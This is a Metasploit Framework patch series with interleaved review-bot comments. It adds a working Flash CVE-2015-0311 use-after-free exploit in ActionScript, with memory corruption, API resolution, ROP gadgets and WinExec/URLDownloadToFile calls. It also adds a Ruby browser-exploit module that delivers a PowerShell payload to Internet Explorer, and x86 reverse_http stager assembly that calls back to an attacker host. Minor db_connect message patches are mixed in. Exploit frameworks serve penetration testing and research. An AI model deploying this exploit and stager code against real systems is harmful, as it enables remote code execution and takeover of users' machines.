dd 5ca4000 + length vtable? 
data + 05ca4000 ffffffff 05042000 05ca4000 00000000 + 05ca4010 00000000 00000000 00000000 00000000 + 05ca4020 00000000 00000000 00000000 00000000 + 05ca4030 00000000 00000000 00000000 00000000 + 05ca4040 00000000 00000000 00000000 00000000 + 05ca4050 00000000 00000000 00000000 00000000 + 05ca4060 00000000 00000000 00000000 00000000 + 05ca4070 00000000 00000000 00000000 00000000 + */ + uv[0][0] = uv[0][0x2000003] - 0x18 - 0x2000000 * 4 + //log("uv[0][0]: " + uv[0][0].toString(16)); + + ba.endian = "littleEndian" + ba.length = 0x500000 + var buffer:uint = vector_read(vector_read(uv[0][0x2000008] - 1 + 0x40) + 8) + 0x100000 + //log("buffer: " + buffer.toString(16)); + + var main:uint = uv[0][0x2000009] - 1 + //log("main: " + main.toString(16)); + + var vtable:uint = vector_read(main) + //log("vtable: " + vtable.toString(16)); + + vector_write(vector_read(uv[0][0x2000008] - 1 + 0x40) + 8) + vector_write(vector_read(uv[0][0x2000008] - 1 + 0x40) + 16, 0xffffffff) + byte_write(uv[0][0]) + + var flash:uint = base(vtable) + //log("flash: " + flash.toString(16)); + + // Because of the sandbox, when you try to solve kernel32 + // from the flash imports on IE, it will solve ieshims.dll + var ieshims:uint = module("kernel32.dll", flash) + //log("ieshims: " + ieshims.toString(16)); + + var kernel32:uint = module("kernel32.dll", ieshims) + //log("kernel32: " + kernel32.toString(16)); + + var ntdll:uint = module("ntdll.dll", kernel32) + //log("ntdll: " + ntdll.toString(16)); + + var urlmon:uint = module("urlmon.dll", flash) + //log("urlmon: " + urlmon.toString(16)); + + var virtualprotect:uint = procedure("VirtualProtect", kernel32) + //log("virtualprotect: " + virtualprotect.toString(16)); + + var winexec:uint = procedure("WinExec", kernel32) + //log("winexec: " + winexec.toString(16)); + + var urldownloadtofile:uint = procedure("URLDownloadToFileA", urlmon); + //log("urldownloadtofile: " + urldownloadtofile.toString(16)); + + var getenvironmentvariable:uint = 
procedure("GetEnvironmentVariableA", kernel32) + //log("getenvironmentvariable: " + getenvironmentvariable.toString(16)); + + var setcurrentdirectory:uint = procedure("SetCurrentDirectoryA", kernel32) + //log("setcurrentdirectory: " + setcurrentdirectory.toString(16)); + + var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash) + //log("xchgeaxespret: " + xchgeaxespret.toString(16)); + + var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash) + //log("xchgeaxesiret: " + xchgeaxesiret.toString(16)); + + // CoE + byte_write(buffer + 0x30000, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable + byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main + byte_write(0, "\x89\x03", false) // mov [ebx], eax + byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret + + + byte_write(buffer+0x200, payload); + byte_write(buffer + 0x20070, xchgeaxespret) + byte_write(buffer + 0x20000, xchgeaxesiret) + byte_write(0, virtualprotect) + + // VirtualProtect + byte_write(0, winexec) + byte_write(0, buffer + 0x30000) + byte_write(0, 0x1000) + byte_write(0, 0x40) + byte_write(0, buffer + 0x100) + + // WinExec + byte_write(0, buffer + 0x30000) + byte_write(0, buffer + 0x200) + byte_write(0) + + byte_write(main, buffer + 0x20000) + toString() + } + + private function vector_write(addr:uint, value:uint = 0):void + { + addr > uv[0][0] ? uv[0][(addr - uv[0][0]) / 4 - 2] = value : uv[0][0xffffffff - (uv[0][0] - addr) / 4 - 1] = value + } + + private function vector_read(addr:uint):uint + { + return addr > uv[0][0] ? 
uv[0][(addr - uv[0][0]) / 4 - 2] : uv[0][0xffffffff - (uv[0][0] - addr) / 4 - 1] + } + + private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void + { + if (addr) ba.position = addr + if (value is String) { + for (var i:uint; i < value.length; i++) ba.writeByte(value.charCodeAt(i)) + if (zero) ba.writeByte(0) + } else ba.writeUnsignedInt(value) + } + + private function byte_read(addr:uint, type:String = "dword"):uint + { + ba.position = addr + switch(type) { + case "dword": + return ba.readUnsignedInt() + case "word": + return ba.readUnsignedShort() + case "byte": + return ba.readUnsignedByte() + } + return 0 + } + + private function base(addr:uint):uint + { + addr &= 0xffff0000 + while (true) { + if (byte_read(addr) == 0x00905a4d) return addr + addr -= 0x10000 + } + return 0 + } + + private function module(name:String, addr:uint):uint + { + var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80) + var i:int = -1 + while (true) { + var entry:uint = byte_read(iat + (++i) * 0x14 + 12) + if (!entry) throw new Error("FAIL!"); + ba.position = addr + entry + var dll_name:String = ba.readUTFBytes(name.length).toUpperCase(); + if (dll_name == name.toUpperCase()) { + break; + } + } + return base(byte_read(addr + byte_read(iat + i * 0x14 + 16))); + } + + private function procedure(name:String, addr:uint):uint + { + var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78) + var numberOfNames:uint = byte_read(eat + 0x18) + var addressOfFunctions:uint = addr + byte_read(eat + 0x1c) + var addressOfNames:uint = addr + byte_read(eat + 0x20) + var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24) + + for (var i:uint = 0; ; i++) { + var entry:uint = byte_read(addressOfNames + i * 4) + ba.position = addr + entry + if (ba.readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break + } + return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4) + } + + private function 
gadget(gadget:String, hint:uint, addr:uint):uint + { + var find:uint = 0 + var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50) + var value:uint = parseInt(gadget, 16) + for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break + return addr + i + } + } +} + diff --git a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uaf.rb new file mode 100644 index 0000000000..4f6accf4b2 --- /dev/null +++ b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uaf.rb 
@@ -0,0 +1,107 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Powershell + include Msf::Exploit::Remote::BrowserExploitServer + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free', + 'Description' => %q{ + This module exploits an use after free vulnerability in Adobe Flash Player. The + vulnerability occurs in the ByteArray::UncompressViaZlibVariant method, when trying + to uncompress() a malformed byte stream. This module has been tested successfully + on Windows 7 SP1 (32 bits), IE 8 to IE 11 and Flash 16.0.0.287, 16.0.0.257 and + 16.0.0.235. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # Vulnerability discovery and exploit in the wild + 'hdarwin', # Public exploit by @hdarwin89 + 'juan vazquez' # msf module + ], + 'References' => + [ + ['CVE', '2015-0311'], + ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html'], + ['URL', 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/'], + ['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/' ] + ], + 'Payload' => + { + 'DisableNops' => true + }, + 'Platform' => 'win', + 'BrowserRequirements' => + { + :source => /script|headers/i, + :os_name => OperatingSystems::Match::WINDOWS_7, + :ua_name => Msf::HttpClients::IE, + :flash => lambda { |ver| ver =~ /^16\./ && ver <= '16.0.0.287' }, + :arch => ARCH_X86 + }, + 'Targets' => + [ + [ 'Automatic', {} ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Apr 28 2014', + 'DefaultTarget' => 0)) + end + + def exploit + @swf = create_swf + super + end + + def on_request_exploit(cli, request, target_info) + print_status("Request: #{request.uri}") + + if request.uri =~ /\.swf$/ 
+ print_status("Sending SWF...") + send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) + return + end + + print_status("Sending HTML...") + send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) + end + + def exploit_template(cli, target_info) + swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" + target_payload = get_payload(cli, target_info) + psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) + b64_payload = Rex::Text.encode_base64(psh_payload) + + html_template = %Q| + + + + + + + + + + + | + + return html_template, binding() + end + + def create_swf + path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2015-0311", "msf.swf" ) + swf = ::File.open(path, 'rb') { |f| swf = f.read } + + swf + end + +end From 78167c3bb80f0afc2915a02e1745d7eaa14cb703 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 9 Mar 2015 16:55:21 -0500 Subject: [PATCH 03/18] Use single quotes when possible --- .../windows/browser/adobe_flash_uncompress_zlib_uaf.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uaf.rb index 4f6accf4b2..5f7996a7eb 100644 --- a/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uaf.rb +++ b/modules/exploits/windows/browser/adobe_flash_uncompress_zlib_uaf.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote ['CVE', '2015-0311'], ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html'], ['URL', 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/'], - ['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/' ] + ['URL', 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/'] ], 'Payload' => { 
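Review bot: `create_swf` carries a redundant inner assignment — `::File.open(path, 'rb') { |f| swf = f.read }` already evaluates to the block's value, so the whole method collapses to `::File.binread(::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0311', 'msf.swf'))`. The `'DisclosureDate' => 'Apr 28 2014'` entry predates the CVE-2015-0311 identifier and the apsa15-01 advisory listed under References; it looks like a carry-over from another module, so confirm the date against the advisory before merging. The later hunk in this series that touches `create_swf` (PATCH 03) only changes the quoting and keeps the redundant assignment.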
@@ -66,12 +66,12 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ - print_status("Sending SWF...") + print_status('Sending SWF...') send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end - print_status("Sending HTML...") + print_status('Sending HTML...') send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end @@ -98,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote end def create_swf - path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2015-0311", "msf.swf" ) + path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0311', 'msf.swf') swf = ::File.open(path, 'rb') { |f| swf = f.read } swf From 14c3848493508eeb02dcd0af347301f0641ee151 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Mon, 9 Mar 2015 16:59:10 -0500 Subject: [PATCH 04/18] Delete useless comment --- external/source/exploits/CVE-2015-0311/Main.as | 1 - 1 file changed, 1 deletion(-) diff --git a/external/source/exploits/CVE-2015-0311/Main.as b/external/source/exploits/CVE-2015-0311/Main.as index 34b97b9ac6..9393a0495a 100755 --- a/external/source/exploits/CVE-2015-0311/Main.as +++ b/external/source/exploits/CVE-2015-0311/Main.as @@ -61,7 +61,6 @@ package /* 0:008> dd 5ca4000 - length vtable? data 05ca4000 ffffffff 05042000 05ca4000 00000000 05ca4010 00000000 00000000 00000000 00000000 05ca4020 00000000 00000000 00000000 00000000 From 187a0445f32328d25780f4ae9607b246ad473dbb Mon Sep 17 00:00:00 2001 From: nstarke Date: Tue, 10 Mar 2015 00:02:34 +0000 Subject: [PATCH 05/18] Issue #4868 - Adding warning message to db_connect when already connected --- lib/msf/ui/console/command_dispatcher/db.rb | 9 +++++++++ 1 file changed, 9 insertions(+) diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index 0f2453ca17..982ce1bdf9 100644 
--- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -1706,6 +1706,15 @@ class Db def cmd_db_connect(*args) return if not db_check_driver + if framework.db.connection_established? + cdb = "" + ::ActiveRecord::Base.connection_pool.with_connection { |conn| + if conn.respond_to? :current_database + cdb = conn.current_database + end + } + return print_status("#{framework.db.driver} already connected to #{cdb}") + end if (args[0] == "-y") if (args[1] and not ::File.exists? ::File.expand_path(args[1])) print_error("File not found") From ee8318d5c49e1f4cc930d5ec031a87732b74474f Mon Sep 17 00:00:00 2001 From: nstarke Date: Tue, 10 Mar 2015 11:58:04 +0000 Subject: [PATCH 06/18] Adding db_disconnect qualifying statement --- lib/msf/ui/console/command_dispatcher/db.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index 982ce1bdf9..25016d904c 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -1713,7 +1713,9 @@ class Db cdb = conn.current_database end } - return print_status("#{framework.db.driver} already connected to #{cdb}") + status = "#{framework.db.driver} already connected to #{cdb}. " + status += "Run db_disconnect first if you wish to connect to a different database." + return print_status(status) end if (args[0] == "-y") if (args[1] and not ::File.exists? ::File.expand_path(args[1])) From e81f2e366c8d757ec0780f74dc1874b517f81baa Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 10 Mar 2015 12:35:58 -0500 Subject: [PATCH 07/18] Refactor db_{status,connect} a bit Also allow for db_connect help. --- lib/msf/ui/console/command_dispatcher/db.rb | 20 ++++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) 
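Review bot: The new `cdb = ""` default in cmd_db_connect leaves the status line ending in `already connected to ` with nothing after it whenever the adapter does not respond to `current_database`; a readable fallback such as `cdb = "(unknown database)"` keeps the message meaningful on those adapters. The follow-up hunks in this series that rework the same block (PATCH 06, and both db.rb hunks of PATCH 07) keep the empty default, so the same applies there. cmd_db_connect's body continues past the hunk.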
diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb index 25016d904c..0ba92f5c4c 100644 --- a/lib/msf/ui/console/command_dispatcher/db.rb +++ b/lib/msf/ui/console/command_dispatcher/db.rb @@ -1688,11 +1688,11 @@ class Db if framework.db.connection_established? cdb = "" - ::ActiveRecord::Base.connection_pool.with_connection { |conn| - if conn.respond_to? :current_database + ::ActiveRecord::Base.connection_pool.with_connection do |conn| + if conn.respond_to?(:current_database) cdb = conn.current_database end - } + end print_status("#{framework.db.driver} connected to #{cdb}") else print_status("#{framework.db.driver} selected, no connection") @@ -1706,16 +1706,16 @@ class Db def cmd_db_connect(*args) return if not db_check_driver - if framework.db.connection_established? + if args[0] != '-h' && framework.db.connection_established? cdb = "" - ::ActiveRecord::Base.connection_pool.with_connection { |conn| - if conn.respond_to? :current_database + ::ActiveRecord::Base.connection_pool.with_connection do |conn| + if conn.respond_to?(:current_database) cdb = conn.current_database end - } - status = "#{framework.db.driver} already connected to #{cdb}. " - status += "Run db_disconnect first if you wish to connect to a different database." - return print_status(status) + end + print_status("#{framework.db.driver} already connected to #{cdb}. " + + "Run db_disconnect first if you wish to connect to a different database.") + return end if (args[0] == "-y") if (args[1] and not ::File.exists? ::File.expand_path(args[1])) From 966848127a94488213a8f0bcf974888de52f4441 Mon Sep 17 00:00:00 2001 
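Review bot: After this patch the `with_connection` / `respond_to?(:current_database)` block is duplicated verbatim in cmd_db_status and cmd_db_connect (both hunks of this patch); pulling it into one private helper keeps the two status messages in step and leaves each command with a single-line lookup. Both methods' bodies extend beyond the hunks, so the helper would sit alongside them in the class.
```ruby
# Name of the database behind the active connection, or "" when the
# adapter does not expose one.
def current_database_name
  name = ""
  ::ActiveRecord::Base.connection_pool.with_connection do |conn|
    name = conn.current_database if conn.respond_to?(:current_database)
  end
  name
end

# … unchanged: rest of cmd_db_status …
print_status("#{framework.db.driver} connected to #{current_database_name}")

# … unchanged: start of cmd_db_connect …
if args[0] != '-h' && framework.db.connection_established?
  print_status("#{framework.db.driver} already connected to #{current_database_name}. " +
    "Run db_disconnect first if you wish to connect to a different database.")
  return
end
```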
From: HD Moore Date: Tue, 10 Mar 2015 12:48:30 -0500 Subject: [PATCH 08/18] Refactor x86 Windows reverse_http and reverse_https stagers --- .../core/handler/reverse_http/uri_checksum.rb | 34 +- lib/msf/core/payload/windows.rb | 7 + lib/msf/core/payload/windows/block_api.rb | 112 ++++++ lib/msf/core/payload/windows/exitfunk.rb | 79 ++++ lib/msf/core/payload/windows/reverse_http.rb | 339 ++++++++++++++++++ lib/msf/core/payload/windows/reverse_https.rb | 63 ++++ .../payloads/stagers/windows/reverse_http.rb | 69 +--- .../payloads/stagers/windows/reverse_https.rb | 63 +--- .../stagers/windows/x64/reverse_https.rb | 2 +- .../handler/reverse_http/uri_checksum_spec.rb | 13 + 10 files changed, 655 insertions(+), 126 deletions(-) create mode 100644 lib/msf/core/payload/windows/block_api.rb create mode 100644 lib/msf/core/payload/windows/exitfunk.rb create mode 100644 lib/msf/core/payload/windows/reverse_http.rb create mode 100644 lib/msf/core/payload/windows/reverse_https.rb diff --git a/lib/msf/core/handler/reverse_http/uri_checksum.rb b/lib/msf/core/handler/reverse_http/uri_checksum.rb index 96e76baec3..fca2a371b6 100644 --- a/lib/msf/core/handler/reverse_http/uri_checksum.rb +++ b/lib/msf/core/handler/reverse_http/uri_checksum.rb @@ -76,8 +76,11 @@ module Msf # Create a URI that matches a given checksum # # @param sum [Fixnum] The checksum value you are trying to create a URI for + # @param len [Fixnum] An optional length value for the created URI # @return [String] The URI string that checksums to the given value - def generate_uri_checksum(sum) + def generate_uri_checksum(sum,len=nil) + return generate_uri_checksum_with_length(sum, len) if len + chk = ("a".."z").to_a + ("A".."Z").to_a + ("0".."9").to_a 32.times do uri = Rex::Text.rand_text_alphanumeric(3) 
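Review bot: The new `len` parameter is documented as optional but its constraint is not: `generate_uri_checksum_with_length`, which this method now delegates to, raises `ArgumentError` for lengths below 5, so a caller passing a small `len` gets an exception the YARD block does not mention; add `# @raise [ArgumentError] if len is given and is less than 5` next to the `@return` tag. The signature `def generate_uri_checksum(sum,len=nil)` should also read `def generate_uri_checksum(sum, len = nil)` to match the spacing used elsewhere in this file. The method body continues past the hunk.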
@@ -90,6 +93,35 @@ module Msf return URI_CHECKSUM_PRECALC[sum] end + # Create an arbitrary length URI that matches a given checksum + # + # @param sum [Fixnum] The checksum value you are trying to create a URI for + # @param len [Fixnum] The length of the created URI + # @return [String] The URI string that checksums to the given value + def generate_uri_checksum_with_length(sum, len) + # Lengths shorter than 4 bytes are unable to match all possible checksums + # Lengths of exactly 4 are relatively slow to find for high checksum values + # Lengths of 5 or more bytes find a matching checksum fairly quickly (~80ms) + raise ArgumentError, "Length must be 5 bytes or greater" if len < 5 + + # Funny enough, this was more efficient than calculating checksum offsets + if len < 40 + loop do + uri = Rex::Text.rand_text_alphanumeric(len) + return uri if Rex::Text.checksum8(uri) == sum + end + end + + # The rand_text_alphanumeric() method becomes a bottleneck at around 40 bytes + # Calculating a static prefix flattens out the average runtime for longer URIs + prefix = Rex::Text.rand_text_alphanumeric(len-20) + + loop do + uri = prefix + Rex::Text.rand_text_alphanumeric(20) + return uri if Rex::Text.checksum8(uri) == sum + end + end + end end end diff --git a/lib/msf/core/payload/windows.rb b/lib/msf/core/payload/windows.rb index 26856d4444..a6fcf932fa 100644 --- a/lib/msf/core/payload/windows.rb +++ b/lib/msf/core/payload/windows.rb @@ -150,5 +150,12 @@ module Msf::Payload::Windows return true end + # + # Share the EXITFUNC mappings with other classes + # + def self.exit_types + @@exit_types.dup + end + end diff --git a/lib/msf/core/payload/windows/block_api.rb b/lib/msf/core/payload/windows/block_api.rb new file mode 100644 index 0000000000..c1fbbf5da1 --- /dev/null +++ b/lib/msf/core/payload/windows/block_api.rb 
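Review bot: generate_uri_checksum_with_length validates len but not sum, and both `loop do` searches only exit when Rex::Text.checksum8 returns sum, so a sum outside the byte range the checksum can produce (the spec added later in this series exercises 0..255) never matches and the method spins forever instead of failing. A guard next to the length check, `raise ArgumentError, "Checksum must be between 0 and 255" unless (0..255).cover?(sum)`, turns that into an immediate error. `len-20` would also read better as `len - 20`, matching the spacing used elsewhere in the method.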
@@ -0,0 +1,112 @@ +# -*- coding: binary -*- + +require 'msf/core' + +module Msf + + +### +# +# Basic block_api stubs for Windows ARCH_X86 payloads +# +### + + +module Payload::Windows::BlockApi + + def asm_block_api(opts={}) + + raw = %q^ + + api_call: + pushad ; We preserve all the registers for the caller, bar EAX and ECX. + mov ebp, esp ; Create a new stack frame + xor eax, eax ; Zero EAX (upper 3 bytes will remain zero until function is found) + mov edx, [fs:eax+48] ; Get a pointer to the PEB + mov edx, [edx+12] ; Get PEB->Ldr + mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list + next_mod: ; + mov esi, [edx+40] ; Get pointer to modules name (unicode string) + movzx ecx, word [edx+38] ; Set ECX to the length we want to check + xor edi, edi ; Clear EDI which will store the hash of the module name + loop_modname: ; + lodsb ; Read in the next byte of the name + cmp al, 'a' ; Some versions of Windows use lower case module names + jl not_lowercase ; + sub al, 0x20 ; If so normalise to uppercase + not_lowercase: ; + ror edi, 13 ; Rotate right our hash value + add edi, eax ; Add the next byte of the name + loop loop_modname ; Loop untill we have read enough + + ; We now have the module hash computed + push edx ; Save the current position in the module list for later + push edi ; Save the current module hash for later + ; Proceed to iterate the export address table + mov edx, [edx+16] ; Get this modules base address + mov ecx, [edx+60] ; Get PE header + + ; use ecx as our EAT pointer here so we can take advantage of jecxz. 
+ mov ecx, [ecx+edx+120] ; Get the EAT from the PE header + jecxz get_next_mod1 ; If no EAT present, process the next module + add ecx, edx ; Add the modules base address + push ecx ; Save the current modules EAT + mov ebx, [ecx+32] ; Get the rva of the function names + add ebx, edx ; Add the modules base address + mov ecx, [ecx+24] ; Get the number of function names + ; now ecx returns to its regularly scheduled counter duties + + ; Computing the module hash + function hash + get_next_func: ; + jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module + dec ecx ; Decrement the function name counter + mov esi, [ebx+ecx*4] ; Get rva of next module name + add esi, edx ; Add the modules base address + xor edi, edi ; Clear EDI which will store the hash of the function name + ; And compare it to the one we want + loop_funcname: ; + lodsb ; Read in the next byte of the ASCII function name + ror edi, 13 ; Rotate right our hash value + add edi, eax ; Add the next byte of the name + cmp al, ah ; Compare AL (the next byte from the name) to AH (null) + jne loop_funcname ; If we have not reached the null terminator, continue + add edi, [ebp-8] ; Add the current module hash to the function hash + cmp edi, [ebp+36] ; Compare the hash to the one we are searchnig for + jnz get_next_func ; Go compute the next function hash if we have not found it + + ; If found, fix up stack, call the function and then value else compute the next one... + pop eax ; Restore the current modules EAT + mov ebx, [eax+36] ; Get the ordinal table rva + add ebx, edx ; Add the modules base address + mov cx, [ebx+2*ecx] ; Get the desired functions ordinal + mov ebx, [eax+28] ; Get the function addresses table rva + add ebx, edx ; Add the modules base address + mov eax, [ebx+4*ecx] ; Get the desired functions RVA + add eax, edx ; Add the modules base address to get the functions actual VA + ; We now fix up the stack and perform the call to the desired function... 
+ finish: + mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad + pop ebx ; Clear off the current modules hash + pop ebx ; Clear off the current position in the module list + popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered + pop ecx ; Pop off the origional return address our caller will have pushed + pop edx ; Pop off the hash value our caller will have pushed + push ecx ; Push back the correct return value + jmp eax ; Jump into the required function + ; We now automagically return to the correct caller... + + get_next_mod: ; + pop edi ; Pop off the current (now the previous) modules EAT + get_next_mod1: ; + pop edi ; Pop off the current (now the previous) modules hash + pop edx ; Restore our position in the module list + mov edx, [edx] ; Get the next module + jmp.i8 next_mod ; Process this module + ^ + end + + +end + +end + diff --git a/lib/msf/core/payload/windows/exitfunk.rb b/lib/msf/core/payload/windows/exitfunk.rb new file mode 100644 index 0000000000..3d6e61935c --- /dev/null +++ b/lib/msf/core/payload/windows/exitfunk.rb 
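Review bot: asm_block_api accepts `opts={}` but never reads it, and the `raw = %q^ … ^` assignment exists only to be the implicit return value, so the local can go and the string literal can stand on its own. The method also has no documentation; a header such as `# @param opts [Hash] reserved, currently unused` and `# @return [String] x86 assembly for the api_call resolver; its address must be in EBP before the other asm_* stubs run` makes the contract explicit (the EBP requirement is stated in the reverse_http stub's own comment block). Several comments inside the assembly carry typos ("untill", "searchnig", "origional") that are worth fixing while the file is new.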
@@ -0,0 +1,79 @@
+# -*- coding: binary -*-
+
+require 'msf/core'
+require 'msf/core/payload/windows'
+module Msf
+
+
+###
+#
+# Implements arbitrary exit routines for Windows ARCH_X86 payloads
+#
+###
+
+module Payload::Windows::Exitfunk
+
+ def asm_exitfunk(opts={})
+
+ asm = "exitfunk:\n"
+
+ case opts[:exitfunk]
+
+ when 'seh'
+ asm << %Q^
+ mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['seh']}
+ push.i8 0 ; push the exit function parameter
+ push ebx ; push the hash of the exit function
+ call ebp ; SetUnhandledExceptionFilter(0)
+ push.i8 0
+ ret ; Return to NULL (crash)
+ ^
+
+ # On Windows Vista, Server 2008, and newer, it is not possible to call ExitThread
+ # on WoW64 processes, instead we need to call RtlExitUserThread. This stub will
+ # automatically generate the right code depending on the selected exit method.
+
+ when 'thread'
+ asm << %Q^
+ mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['thread']}
+ push 0x9DBD95A6 ; hash( "kernel32.dll", "GetVersion" )
+ call ebp ; GetVersion(); (AL will = major version and AH will = minor version)
+ cmp al, 6 ; If we are not running on Windows Vista, 2008 or 7
+ jl exitfunk_goodbye ; Then just call the exit function...
+ cmp bl, 0xE0 ; If we are trying a call to kernel32.dll!ExitThread on Windows Vista, 2008 or 7...
+ jne exitfunk_goodbye ;
+ mov ebx, 0x6F721347 ; Then we substitute the EXITFUNK to that of ntdll.dll!RtlExitUserThread
+ exitfunk_goodbye: ; We now perform the actual call to the exit function
+ push.i8 0 ; push the exit function parameter
+ push ebx ; push the hash of the exit function
+ call ebp ; call ExitThread(0) || RtlExitUserThread(0)
+ ^
+
+ when 'process', nil
+ asm << %Q^
+ mov ebx, #{"0x%.8x" % Msf::Payload::Windows.exit_types['process']}
+ push.i8 0 ; push the exit function parameter
+ push ebx ; push the hash of the exit function
+ call ebp ; ExitProcess(0)
+ ^
+
+ when 'sleep'
+ asm << %Q^
+ mov ebx, #{"0x%.8x" % Rex::Text.ror13_hash('Sleep')}
+ push 300000 ; 300 seconds
+ push ebx ; push the hash of the function
+ call ebp ; Sleep(300000)
+ jmp exitfunk ; repeat
+ ^
+ else
+ # Do nothing and continue after the end of the shellcode
+ end
+
+ asm
+ end
+
+
+end
+
+end
+
diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb
new file mode 100644
index 0000000000..c6bb96b3c4
--- /dev/null
+++ b/lib/msf/core/payload/windows/reverse_http.rb
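Review bot: The 'sleep' branch loads `Rex::Text.ror13_hash('Sleep')` into EBX, whereas every other stub on this page uses a pre-combined module+function hash (0x9DBD95A6 is annotated as hash("kernel32.dll", "GetVersion")), and api_call in block_api.rb compares against module hash plus function hash (`add edi, [ebp-8]` followed by `cmp edi, [ebp+36]`). Unless ror13_hash already folds in the unicode module-name hash, this constant will never resolve and the stub walks every export table without ever calling Sleep; computing it the same way as the hard-coded constants — with a helper that takes the module name, such as `Rex::Text.block_api_hash('kernel32.dll', 'Sleep')` in newer rex-text — fixes that. Separately, an unrecognised opts[:exitfunk] value silently emits only the `exitfunk:` label, which the failure path in reverse_http.rb jumps to; a comment on the `else` branch naming that fall-through as the intended behaviour for 'none' would avoid surprise.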
@@ -0,0 +1,339 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'msf/core/payload/windows/block_api' +require 'msf/core/payload/windows/exitfunk' + +module Msf + + +### +# +# Complex payload generation for Windows ARCH_X86 that speak HTTP(S) +# +### + + +module Payload::Windows::ReverseHttp + + include Msf::Payload::Windows::BlockApi + include Msf::Payload::Windows::Exitfunk + + # + # Register reverse_http specific options + # + def initialize(*args) + super + register_advanced_options( + [ + OptInt.new('HTTPStagerURILength', [false, 'The URI length for the stager (5 to 240ish bytes)']) + ], self.class) + end + + # + # Generate the first stage + # + def generate + # Generate the simple version of this stager if we don't have enough space + if self.available_space.nil? || required_space > self.available_space + return generate_reverse_http( + ssl: false, + host: datastore['LHOST'], + port: datastore['LPORT'], + url: "/" + generate_uri_checksum(Msf::Handler::ReverseHttp::URI_CHECKSUM_INITW)) + end + + conf = { + ssl: false, + host: datastore['LHOST'], + port: datastore['LPORT'], + url: generate_uri, + exitfunk: datastore['EXITFUNC'] + } + + generate_reverse_http(conf) + end + + # + # Generate and compile the stager + # + def generate_reverse_http(opts={}) + combined_asm = %Q^ + cld ; Clear the direction flag. + call start ; Call start, this pushes the address of 'api_call' onto the stack. 
